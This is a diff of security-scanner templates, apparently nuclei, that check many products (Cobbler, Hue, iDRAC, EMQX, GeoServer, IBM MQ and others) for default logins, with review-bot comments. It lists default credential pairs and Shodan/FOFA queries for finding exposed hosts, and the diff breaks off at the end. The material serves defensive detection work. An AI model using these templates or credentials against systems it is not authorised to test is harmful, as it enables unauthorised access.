+ author: c-sh0
+ severity: high
+ description: Cobbler default login credentials for the testing module (testing/testing) were discovered.
+ reference:
+ - https://seclists.org/oss-sec/2022/q1/146
+ - https://github.com/cobbler/cobbler/issues/2307
+ - https://github.com/cobbler/cobbler/issues/2909
+ classification:
+ cwe-id: CWE-798
+ tags: cobbler,default-login,api
+
+requests:
+ - raw:
+ - |
+ POST {{BaseURL}}/cobbler_api HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: text/xml
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+
+
+ login
+
+
+
+ {{username}}
+
+
+
+
+ {{password}}
+
+
+
+
+
+ attack: pitchfork
+ payloads:
+ username:
+ - cobbler
+ - testing
+ password:
+ - cobbler
+ - testing
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - 'text/xml'
+
+ - type: dsl
+ dsl:
+ - "!contains(tolower(body), 'faultCode')"
+ - "!contains(tolower(body), 'login failed')"
+ condition: or
+
+ - type: regex
+ part: body
+ regex:
+ - "(.*[a-zA-Z0-9].+==)"
+
+# Enhanced by mp on 2022/03/03
diff --git a/default-logins/cobbler/hue-default-credential.yaml b/default-logins/cobbler/hue-default-credential.yaml
new file mode 100644
index 0000000000..d1490c1eb0
--- /dev/null
+++ b/default-logins/cobbler/hue-default-credential.yaml
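Review bot: The dsl matcher `"!contains(tolower(body), 'faultCode')"` lowercases the body and then searches for a mixed-case literal, so the `contains` can never be true and its negation always passes; combined with `condition: or`, the whole dsl matcher is satisfied by every response, including an XML-RPC fault, and the only real gate left is the loose base64-looking regex. Lowercase the literal and require both negative checks: `- "!contains(tolower(body), 'faultcode')"` with `condition: and`. The XML-RPC request body between the `Accept:` header and `attack:` has also been rendered as empty lines in this diff view, so the `methodCall` structure around `login`, `{{username}}` and `{{password}}` should be checked in the file itself rather than taken from here.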
@@ -0,0 +1,70 @@
+id: hue-default-credential
+
+info:
+ name: Cloudera Hue Default Admin Login
+ author: For3stCo1d
+ severity: high
+ description: Cloudera Hue default admin credentials were discovered.
+ reference:
+ - https://github.com/cloudera/hue
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
+ metadata:
+ shodan-query: title:"Hue - Welcome to Hue"
+ tags: hue,default-login,oss,cloudera
+
+requests:
+ - raw:
+ - |
+ GET /hue/accounts/login?next=/ HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /hue/accounts/login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F
+
+ attack: pitchfork
+ payloads:
+ user:
+ - admin
+ - hue
+ - hadoop
+ - cloudera
+
+ pass:
+ - admin
+ - hue
+ - hadoop
+ - cloudera
+
+ cookie-reuse: true
+ extractors:
+ - type: regex
+ name: csrfmiddlewaretoken
+ part: body
+ internal: true
+ group: 1
+ regex:
+ - name='csrfmiddlewaretoken' value='(.+?)'
+
+ req-condition: true
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - contains(tolower(body_1), 'welcome to hue')
+ - contains(tolower(all_headers_2), 'csrftoken=')
+ - contains(tolower(all_headers_2), 'sessionid=')
+ condition: and
+
+ - type: status
+ status:
+ - 302
+
+# Enhanced by mp on 2022/03/28
diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml
index 6e06c1ace2..5629d90f41 100644
--- a/default-logins/dell/dell-idrac-default-login.yaml
+++ b/default-logins/dell/dell-idrac-default-login.yaml
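Review bot: This Cloudera Hue template is added at `default-logins/cobbler/hue-default-credential.yaml`, inside the Cobbler vendor directory, and its `id` uses a `-default-credential` suffix while every other template in `default-logins/` touched by this commit uses `<product>-default-login`. Move the file to a `default-logins/hue/` directory and rename the id to `hue-default-login` so directory, id and tags stay aligned for anyone filtering by path or id. The `status` matcher has no `part:` and, with `req-condition: true`, it is not obvious from the template which of the two responses the `302` is checked against; a `# 302 is the post-login redirect from the second request — confirm` comment, or a `status_code_2 == 302` term in the dsl matcher instead, would remove the ambiguity.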
@@ -1,8 +1,14 @@
 id: dell-idrac-default-login
+
 info:
- name: Dell iDRAC6/7/8 Default login
+ name: Dell iDRAC6/7/8 Default Login
 author: kophjager007
 severity: high
+ description: Dell iDRAC6/7/8 default login information was discovered. The default iDRAC username and password are widely known, and any user with access to the server could change the default password.
+ reference:
+ - https://securityforeveryone.com/tools/dell-idrac6-7-8-default-login-scanner
+ classification:
+ cwe-id: CWE-798
 tags: dell,idrac,default-login
 
 requests:
@@ -34,3 +40,5 @@ requests:
 - type: word
 words:
 - '0'
+
+# Enhanced by mp on 2022/03/03
diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml
index d60325405b..ff09878538 100644
--- a/default-logins/dell/dell-idrac9-default-login.yaml
+++ b/default-logins/dell/dell-idrac9-default-login.yaml
@@ -4,6 +4,11 @@ info:
 name: DELL iDRAC9 Default Login
 author: kophjager007,milo2012
 severity: high
+ description: DELL iDRAC9 default login information was discovered. The default iDRAC username and password are widely known, and any user with access to the server could change the default password.
+ reference:
+ - https://www.dell.com/support/kbdoc/en-us/000177787/how-to-change-the-default-login-password-of-the-idrac-9
+ classification:
+ cwe-id: cwe-798
 tags: dell,idrac,default-login
 
 requests:
@@ -33,3 +38,5 @@ requests:
 part: body
 words:
 - '"authResult":0'
+
+# Enhanced by mp on 2022/03/03
diff --git a/default-logins/dell/emcecom-default-login.yaml b/default-logins/dell/emcecom-default-login.yaml
index c7d78156d9..7ec4aff9bc 100644
--- a/default-logins/dell/emcecom-default-login.yaml
+++ b/default-logins/dell/emcecom-default-login.yaml
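Review bot: The iDRAC9 hunk writes `cwe-id: cwe-798` in lowercase while the iDRAC6/7/8 hunk directly above it and every other classification in this diff write `CWE-798`; anything that groups or links templates by CWE identifier will treat the two spellings as different values. Change it to `cwe-id: CWE-798`. The same lowercase form appears in `default-logins/exacqvision/exacqvision-default-login.yaml` later in this diff and should be corrected there too.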
@@ -4,8 +4,13 @@ info:
 name: Dell EMC ECOM Default Login
 author: Techryptic (@Tech)
 severity: high
- description: Default Login of admin:#1Password on Dell EMC ECOM application.
- reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
+ description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered.
+ reference:
+ - https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
+ classification:
+ cwe-id: CWE-798
+ remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array.
+ If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP.
 tags: dell,emc,ecom,default-login
 
 requests:
@@ -35,4 +40,6 @@ requests:
 
 - type: status
 status:
- - 200
\ No newline at end of file
+ - 200
+
+# Enhanced by mp on 2022/03/03
diff --git a/default-logins/digitalrebar/digitalrebar-default-login.yaml b/default-logins/digitalrebar/digitalrebar-default-login.yaml
new file mode 100644
index 0000000000..96c5a273d5
--- /dev/null
+++ b/default-logins/digitalrebar/digitalrebar-default-login.yaml
@@ -0,0 +1,49 @@
+id: digitalrebar-default-login
+
+info:
+ name: RackN Digital Rebar Default Login
+ author: c-sh0
+ severity: high
+ description: A RackN Digital Rebar default login was discovered.
+ reference:
+ - https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html?#what-are-the-default-passwords
+ - https://rackn.com/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
+ tags: rackn,digitalrebar,default-login
+
+requests:
+ - raw:
+ - |
+ GET /api/v3/users HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Basic {{base64(username + ':' + password)}}
+
+ payloads:
+ username:
+ - rocketskates
+ password:
+ - r0cketsk8ts
+
+ attack: pitchfork
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: regex
+ part: header
+ regex:
+ - '(?i)(X-Drp-)'
+
+ - type: word
+ part: body
+ words:
+ - 'Name'
+ - 'Secret'
+ condition: and
+
+# Enhanced by mp on 2022/03/22
diff --git a/default-logins/druid/druid-default-login.yaml b/default-logins/druid/druid-default-login.yaml
index 78d252b867..6f81354021 100644
--- a/default-logins/druid/druid-default-login.yaml
+++ b/default-logins/druid/druid-default-login.yaml
@@ -1,9 +1,12 @@
 id: druid-default-login
 
 info:
- name: Druid Default Login
+ name: Apache Druid Default Login
 author: pikpikcu
 severity: high
+ description: Apache Druid default login information (admin/admin) was discovered.
+ classification:
+ cwe-id: CWE-798
 tags: druid,default-login
 
 requests:
@@ -36,4 +39,6 @@ requests:
 
 - type: regex
 regex:
- - "^success$"
\ No newline at end of file
+ - "^success$"
+
+# Enhanced by mp on 2022/03/03
diff --git a/default-logins/dvwa/dvwa-default-login.yaml b/default-logins/dvwa/dvwa-default-login.yaml
index 941c2c30d0..fdf974e494 100644
--- a/default-logins/dvwa/dvwa-default-login.yaml
+++ b/default-logins/dvwa/dvwa-default-login.yaml
@@ -1,8 +1,14 @@
 id: dvwa-default-login
+
 info:
 name: DVWA Default Login
 author: pdteam
 severity: critical
+ description: Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario.
+ reference:
+ - https://opensourcelibs.com/lib/dvwa
+ classification:
+ cwe-id: CWE-798
 tags: dvwa,default-login
 
 requests:
@@ -50,3 +56,5 @@ requests:
 - type: word
 words:
 - "You have logged in as 'admin'"
+
+# Enhanced by mp on 2022/03/03
diff --git a/default-logins/emqx/emqx-default-login.yaml b/default-logins/emqx/emqx-default-login.yaml
new file mode 100644
index 0000000000..5b55f228e5
--- /dev/null
+++ b/default-logins/emqx/emqx-default-login.yaml
@@ -0,0 +1,39 @@
+id: emqx-default-login
+
+info:
+ name: Emqx Default Admin Login
+ author: For3stCo1d
+ severity: high
+ description: Emqx default admin credentials were discovered.
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
+ metadata:
+ shodan-query: http.favicon.hash:"-670975485"
+ tags: emqx,default-login
+
+requests:
+ - raw:
+ - |
+ POST /api/v4/auth HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ {"username":"{{user}}","password":"{{pass}}"}
+
+ attack: pitchfork
+ payloads:
+ user:
+ - admin
+ pass:
+ - public
+
+ matchers:
+ - type: dsl
+ dsl:
+ - body == "{\"code\":0}"
+ - status_code == 200
+ condition: and
+
+# Enhanced by mp on 2022/03/28
diff --git a/default-logins/exacqvision/exacqvision-default-login.yaml b/default-logins/exacqvision/exacqvision-default-login.yaml
index e04d3a0f7f..35653b963d 100644
--- a/default-logins/exacqvision/exacqvision-default-login.yaml
+++ b/default-logins/exacqvision/exacqvision-default-login.yaml
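Review bot: The EMQX raw request declares `Content-Type: application/x-www-form-urlencoded` but sends a JSON body (`{"username":"{{user}}","password":"{{pass}}"}`); a server that honours the declared type will fail to parse the credentials and answer with an error, which this template would report as "not vulnerable" even where the default account exists. Change the header to `Content-Type: application/json` so it describes the body actually sent. The dsl check `body == "{\"code\":0}"` is an exact whole-body comparison and will also miss any response that adds whitespace or a further field; `contains(body, '"code":0')` would be the tolerant equivalent.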
@@ -4,8 +4,12 @@ info: name: ExacqVision Default Login author: ELSFA7110 severity: high + description: ExacqVision Web Service default login credentials (admin/admin256) were discovered. + reference: + - https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf + classification: + cwe-id: cwe-798 tags: exacqvision,default-login - reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf requests: - raw: @@ -41,3 +45,5 @@ requests: words: - '"auth":' - '"success": true' + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/flir/flir-default-login.yaml b/default-logins/flir/flir-default-login.yaml index 9cb112ad91..4ac5b71758 100644 --- a/default-logins/flir/flir-default-login.yaml +++ b/default-logins/flir/flir-default-login.yaml @@ -4,6 +4,11 @@ info: name: Flir Default Login author: pikpikcu severity: medium + description: Flir default login credentials (admin/admin) were discovered. + reference: + - https://securitycamcenter.com/flir-default-password/ + classification: + cwe-id: CWE-798 tags: default-login,flir,camera,iot requests: @@ -41,3 +46,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/frps/frp-default-login.yaml b/default-logins/frps/frp-default-login.yaml index 2dc240d633..4ee9aa6cbd 100644 --- a/default-logins/frps/frp-default-login.yaml +++ b/default-logins/frps/frp-default-login.yaml @@ -1,11 +1,15 @@ id: frp-default-login info: - name: Frp Default Login + name: FRP Default Login author: pikpikcu severity: high + description: FRP default login credentials were discovered. + reference: + - https://github.com/fatedier/frp/issues/1840 + classification: + cwe-id: CWE-798 tags: frp,default-login - reference: https://github.com/fatedier/frp/issues/1840 requests: - raw: 
@@ -33,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/fuelcms/fuelcms-default-login.yaml b/default-logins/fuelcms/fuelcms-default-login.yaml new file mode 100644 index 0000000000..c46140539c --- /dev/null +++ b/default-logins/fuelcms/fuelcms-default-login.yaml @@ -0,0 +1,56 @@ +id: fuelcms-default-login + +info: + name: Fuel CMS Default Credentials + author: Adam Crosser + severity: high + description: Fuel CMS default admin credentials were discovered. + reference: + - https://docs.getfuelcms.com/general/security + tags: fuelcms,default-login,oss + +requests: + - raw: + - | + GET /fuel/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /fuel/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user_name={{username}}&password={{password}}&Login=Login&forward=&ci_csrf_token_FUEL={{csrftoken}} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - "/fuel/dashboard" + + - type: regex + part: header + regex: + - 'fuel_(.*)=' + + - type: status + status: + - 302 + + extractors: + - type: regex + part: body + name: csrftoken + internal: true + group: 1 + regex: + - 'id="ci_csrf_token_FUEL" value="([0-9a-z]+)" \/>' diff --git a/default-logins/geoserver/geoserver-default-login.yaml b/default-logins/geoserver/geoserver-default-login.yaml new file mode 100644 index 0000000000..8a9e8d01ec --- /dev/null +++ b/default-logins/geoserver/geoserver-default-login.yaml 
@@ -0,0 +1,46 @@ +id: geoserver-default-login + +info: + name: Geoserver Default Admin Login + author: For3stCo1d + severity: high + description: Geoserver default admin credentials were discovered. + reference: + - http://geoserver.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + fofa-query: app="GeoServer" + tags: geoserver,default-login + +requests: + - raw: + - | + POST /geoserver/j_spring_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{user}}&password={{pass}} + + attack: pitchfork + payloads: + user: + - admin + pass: + - geoserver + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "contains(tolower(location), '/geoserver/web')" + - "!contains(tolower(location), 'error=true')" + condition: and + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/28 diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml index 585f8d1bab..d2bdd5eafe 100644 --- a/default-logins/gitlab/gitlab-weak-login.yaml +++ b/default-logins/gitlab/gitlab-weak-login.yaml @@ -1,18 +1,18 @@ id: gitlab-weak-login info: - name: Gitlab Weak Login + name: Gitlab Default Login author: Suman_Kar,dwisiswant0 severity: high - tags: gitlab,default-login + description: Gitlab default login credentials were discovered. reference: - https://twitter.com/0xmahmoudJo0/status/1467394090685943809 - https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab + classification: + cwe-id: CWE-798 metadata: shodan-query: http.title:"GitLab" - - # Gitlab blocks for 10 minutes after 5 "Invalid" attempts for valid user. - # So make sure, not to attempt more than 4 password for same valid user. + tags: gitlab,default-login requests: - raw: 
@@ -53,4 +53,6 @@ requests: - '"access_token":' - '"token_type":' - '"refresh_token":' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/glpi/glpi-default-login.yaml b/default-logins/glpi/glpi-default-login.yaml index c2ea4c26d7..743d3b25d8 100644 --- a/default-logins/glpi/glpi-default-login.yaml +++ b/default-logins/glpi/glpi-default-login.yaml @@ -4,9 +4,12 @@ info: name: GLPI Default Login author: andysvints severity: high + description: GLPI default login credentials were discovered. GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled. + reference: + - https://glpi-project.org/ + classification: + cwe-id: CWE-798 tags: glpi,default-login - description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled. - reference: https://glpi-project.org/ requests: - raw: @@ -65,3 +68,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/03 diff --git a/default-logins/google/google-earth-dlogin.yaml b/default-logins/google/google-earth-dlogin.yaml index 8e29091076..ae7bc0bc25 100644 --- a/default-logins/google/google-earth-dlogin.yaml +++ b/default-logins/google/google-earth-dlogin.yaml 
@@ -4,10 +4,23 @@ info: name: Google Earth Enterprise Default Login author: orpheus,johnjhacking severity: high - tags: default-login,google - reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html + description: | + Google Earth Enterprise default login credentials were discovered. + reference: + - https://johnjhacking.com/blog/gee-exploitation/ + - https://www.opengee.org/geedocs/5.2.2/answer/3470759.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + remediation: | + To reset the username and password: + + sudo /opt/google/gehttpd/bin/htpasswd -c + /opt/google/gehttpd/conf.d/.htpasswd geapacheuse" metadata: - shodan-query: 'title:"GEE Server"' + shodan-query: title:"GEE Server" + tags: default-login,google-earth requests: - raw: @@ -34,4 +47,6 @@ requests: condition: and words: - 'DashboardPanel' - - 'Earth Enterprise Server' \ No newline at end of file + - 'Earth Enterprise Server' + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/gophish/gophish-default-login.yaml b/default-logins/gophish/gophish-default-login.yaml new file mode 100644 index 0000000000..517201be20 --- /dev/null +++ b/default-logins/gophish/gophish-default-login.yaml 
@@ -0,0 +1,55 @@ +id: gophish-default-login + +info: + name: Gophish < v0.10.1 Default Credentials + author: arcc,dhiyaneshDK + severity: high + description: For versions of Gophish > 0.10.1, the temporary administrator credentials are printed in the logs when you first execute the Gophish binary. + reference: + - https://docs.getgophish.com/user-guide/getting-started + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: gophish,default-login + +requests: + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{user}}&password={{pass}}&csrf_token={{replace(url_encode(html_unescape(csrf_token)), "+", "%2B")}} + + attack: pitchfork + payloads: + user: + - admin + pass: + - gophish + + cookie-reuse: true + extractors: + - type: regex + name: csrf_token + part: body + internal: true + group: 1 + regex: + - 'name="csrf_token" value="(.+?)"' + + matchers: + - type: dsl + dsl: + - "!contains(tolower(all_headers), 'location: /login')" + - "contains(tolower(all_headers), 'location: /')" + - "contains(tolower(all_headers), 'gophish')" + - "status_code==302" + condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/grafana/grafana-default-login.yaml b/default-logins/grafana/grafana-default-login.yaml index 125010431f..c6f47b7acd 100644 --- a/default-logins/grafana/grafana-default-login.yaml +++ b/default-logins/grafana/grafana-default-login.yaml 
@@ -4,11 +4,16 @@ info: name: Grafana Default Login author: pdteam severity: high - tags: grafana,default-login + description: Grafana default admin login credentials were detected. reference: - https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection - https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page - https://github.com/grafana/grafana/issues/14755 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: grafana,default-login requests: - raw: @@ -35,14 +40,16 @@ requests: matchers: - type: word words: - - "grafana_session" # Login cookie + - "grafana_session" # Login cookie part: header - type: word part: body words: - - "Logged in" # Logged in keyword + - "Logged in" # Logged in keyword - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/guacamole/guacamole-default-login.yaml b/default-logins/guacamole/guacamole-default-login.yaml index 3ab8960dd6..706089ea58 100644 --- a/default-logins/guacamole/guacamole-default-login.yaml +++ b/default-logins/guacamole/guacamole-default-login.yaml @@ -4,8 +4,14 @@ info: name: Guacamole Default Login author: r3dg33k severity: high + description: Guacamole default admin login credentials were detected. + reference: + - https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: guacamole,default-login - reference: https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22. requests: - raw: @@ -41,4 +47,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/10 
diff --git a/default-logins/hongdian/hongdian-default-login.yaml b/default-logins/hongdian/hongdian-default-login.yaml index a1549c0fa0..56fe4e96b0 100644 --- a/default-logins/hongdian/hongdian-default-login.yaml +++ b/default-logins/hongdian/hongdian-default-login.yaml @@ -4,6 +4,13 @@ info: name: Hongdian Default Login author: gy741 severity: high + description: Hongdian default login information was detected. + reference: + - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: hongdian,default-login requests: @@ -46,3 +53,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/hortonworks/smartsense-default-login.yaml b/default-logins/hortonworks/smartsense-default-login.yaml index 0bddf7fce8..3fa5ac2349 100644 --- a/default-logins/hortonworks/smartsense-default-login.yaml +++ b/default-logins/hortonworks/smartsense-default-login.yaml @@ -4,8 +4,13 @@ info: name: HortonWorks SmartSense Default Login author: Techryptic (@Tech) severity: high - description: Default Login of admin:admin on HortonWorks SmartSense application. - reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html + description: HortonWorks SmartSense default admin login information was detected. + reference: + - https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: hortonworks,smartsense,default-login requests: @@ -35,4 +40,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/10 
diff --git a/default-logins/hp/hp-switch-default-login.yaml b/default-logins/hp/hp-switch-default-login.yaml index 1b5d3bd755..bc37cec117 100644 --- a/default-logins/hp/hp-switch-default-login.yaml +++ b/default-logins/hp/hp-switch-default-login.yaml @@ -1,33 +1,42 @@ -id: hp-switch-default-login -info: - name: HP 1820-8G Switch J9979A Default Credential - author: pussycat0x - severity: high - reference: https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US - metadata: - fofa-query: 'HP 1820-8G Switch J9979A' - tags: default-login,hp - -requests: - - raw: - - | - POST /htdocs/login/login.lua HTTP/1.1 - Host: {{Hostname}} - - username={{username}}&password= - - payloads: - username: - - admin - - matchers-condition: and - matchers: - - type: word - condition: and - words: - - '"redirect": "/htdocs/pages/main/main.lsp"' - - '"error": ""' - - - type: status - status: - - 200 +id: hp-switch-default-login + +info: + name: HP 1820-8G Switch J9979A Default Login + author: pussycat0x + severity: high + description: HP 1820-8G Switch J9979A default admin login credentials were discovered. + reference: + - https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + fofa-query: HP 1820-8G Switch J9979A + tags: default-login,hp + +requests: + - raw: + - | + POST /htdocs/login/login.lua HTTP/1.1 + Host: {{Hostname}} + + username={{username}}&password= + + payloads: + username: + - admin + + matchers-condition: and + matchers: + - type: word + condition: and + words: + - '"redirect": "/htdocs/pages/main/main.lsp"' + - '"error": ""' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/huawei/huawei-HG532e-default-router-login.yaml b/default-logins/huawei/huawei-HG532e-default-router-login.yaml new file mode 100644 index 0000000000..24174f020b 
--- /dev/null +++ b/default-logins/huawei/huawei-HG532e-default-router-login.yaml @@ -0,0 +1,42 @@ +id: huawei-HG532e-default-login + +info: + name: Huawei HG532e Default Credential + author: pussycat0x + severity: high + description: Huawei HG532e default admin credentials were discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: http.html:"HG532e" + tags: default-login,huawei + +requests: + - raw: + - | + POST /index/login.cgi HTTP/1.1 + Host: {{Hostname}} + Cookie: Language=en; FirstMenu=Admin_0; SecondMenu=Admin_0_0; ThirdMenu=Admin_0_0_0 + Content-Type: application/x-www-form-urlencoded + + Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: SessionID' + + - type: word + part: body + words: + - "replace" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/ibm/ibm-mqseries-default-login.yaml b/default-logins/ibm/ibm-mqseries-default-login.yaml index 78424d3229..603c3fa6b0 100644 --- a/default-logins/ibm/ibm-mqseries-default-login.yaml +++ b/default-logins/ibm/ibm-mqseries-default-login.yaml 
@@ -1,44 +1,50 @@ -id: ibm-mqseries-default-login - -info: - name: IBM MQSeries web console default login - author: righettod - severity: high - description: The remote host is running IBM MQ and REST API and is using default credentials. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system. - tags: ibm,default-login - reference: - - https://github.com/ibm-messaging/mq-container/blob/master/etc/mqm/mq.htpasswd - - https://vulners.com/nessus/IBM_MQ_DEFAULT_CREDENTIALS.NASL - -requests: - - raw: - - | - POST /ibmmq/console/j_security_check HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{RootURL}}/ibmmq/console/login.html - - j_username={{username}}&j_password={{password}} - - attack: pitchfork - payloads: - username: - - admin - - app - - mqadmin - password: - - passw0rd - - passw0rd - - mqadmin - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "LtpaToken2_" - - - type: status - status: - - 302 \ No newline at end of file +id: ibm-mqseries-default-login + +info: + name: IBM MQSeries Web Console Default Login + author: righettod + severity: high + description: IBM MQ and REST API default admin credentials were discovered. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system. 
+ reference: + - https://github.com/ibm-messaging/mq-container/blob/master/etc/mqm/mq.htpasswd + - https://vulners.com/nessus/IBM_MQ_DEFAULT_CREDENTIALS.NASL + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: ibm,default-login + +requests: + - raw: + - | + POST /ibmmq/console/j_security_check HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/ibmmq/console/login.html + + j_username={{username}}&j_password={{password}} + + attack: pitchfork + payloads: + username: + - admin + - app + - mqadmin + password: + - passw0rd + - passw0rd + - mqadmin + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "LtpaToken2_" + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/ibm/ibm-storage-default-credential.yaml b/default-logins/ibm/ibm-storage-default-credential.yaml index 6b2df92269..3db2daacb4 100644 --- a/default-logins/ibm/ibm-storage-default-credential.yaml +++ b/default-logins/ibm/ibm-storage-default-credential.yaml @@ -3,8 +3,15 @@ id: ibm-storage-default-login info: name: IBM Storage Management Default Login author: madrobot - severity: medium - tags: default-login,ibm + severity: high + description: IBM Storage Management default admin login credentials were discovered. + reference: + - 